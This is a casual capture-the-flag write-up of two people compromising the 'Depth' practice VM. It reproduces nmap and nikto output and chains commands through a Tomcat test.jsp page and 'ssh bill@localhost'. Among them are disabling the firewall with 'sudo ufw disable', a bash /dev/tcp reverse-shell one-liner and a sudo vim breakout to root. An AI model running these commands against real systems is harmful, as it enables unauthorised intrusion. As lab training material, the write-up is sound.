This was a joint effort by myself and Leigh. Rather than our usual race to finish and first to post, we collaborated, although mildly disconcerting, I think it worked pretty well. His ramblings set me off down a path that turned out to be right, and he picked up on when I was over complicating things and generally being an idiot. As a side note, I’d personally suggest that this is a great VM for a more ‘real world’ scenario and pretty applicable to those of you whom are in practice for your OSCP qualification.

For those that wish to play along:

Let the games begin, release the arp-scan!

And then the obligatory nmap

PORT STATE SERVICE VERSION

8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

| http-methods:

|_ Potentially risky methods: PUT DELETE

|_http-server-header: Apache-Coyote/1.1

|_http-title: Apache Tomcat

and nikto on our web server

root@kali:~# nikto -h 192.168.56.103:8080

- Nikto v2.1.6 Target IP: 192.168.56.103 Target Hostname: 192.168.56.103 Target Port: 8080 Start Time: 2017–12–01 10:13:05 (GMT0) Server: Apache-Coyote/1.1 Server leaks inodes via ETags, header found with file /, fields: 0xW/1896 0x1506485738000 The anti-clickjacking X-Frame-Options header is not present. The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type No CGI Directories found (use ‘-C all’ to force check all possible dirs) Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server. OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server. /: Appears to be a default Apache Tomcat install. /manager/html: Default Tomcat Manager / Host Manager interface found OSVDB-3092: /test.jsp: This might be interesting… /manager/status: Default Tomcat Server Status interface found

So, we have a few interesting thing to take a look at here, I personally started with the PUT command being allowed. I had dreams of dropping a reverse shell onto the web server, oh what a dream it was too, turned out to be a dead end though, I didn’t have authentication so I was doing nothing of the sort! That posture also remained for the DELETE option too.

Which kinda only leaves the default install files (hmmm) and /test.jsp

Test me, like one of your French whores.

This test page has some really odd characteristics and I honestly spent far too long trying to figure out how this thing was functioning, you can copy (cp) files around, you can cat files, you can’t echo into files, and due to the tablature nature of the output, it always comes back in a weird format with not all the information present (sometimes). By way of example, observe my efforts to output the tomcat users:

Ya sod!

I was getting increasingly frustrated at my own ineptitude when Leigh dropped the following on me:

Leigh: ssh bill@localhost ls -l /tmp

Leigh: Looks like ssh works in the restricted shell

Well this set me off down a path, and here’s how I articulated it back:

Firewall blocking every thing we do right…. but we have server side doins! You were so close, ssh but not ssh out of the box, ssh local, but why I hear you ask? Cos you can chain commands, like a boss. ssh bill@localhost sudo -l

Owner Group Size Filename

may run the b2r:

BOSCH! https://askubuntu.com/questions/724792/how-to-make-sure-that-firewall-is-off short read shorter

sudo ufw disable

and the reverse shell after the firewall was down.

ssh bill@localhost bash -i >& /dev/tcp/192.168.56.103/4444 0>&1

I was then a bit giddy because I had my low priv shell, but it was something like 1am at this point so decided to pick it up again in the morning and left the message.

bill has full sudo rights which is rather spicy, also /var/lib/tomcat8/webapps/ROOT which is web root but also appears to be configured as root, so dumped quick php rev shell in, but that failed. I think we are looking at needing a jsp reverse shell to pop root account

I woke up to find Leigh had weighed in and was being sensible about things.

Sudo is ALL: ALL Sudo breakout from VIM cd /root

cat flag

flag{WellThatWasEasy}

Which made me feel stupid as I’d written (a much slated) piece about sudo breakout techniques which can be seen here:

and that is how we popped Depth, and much fun it was too.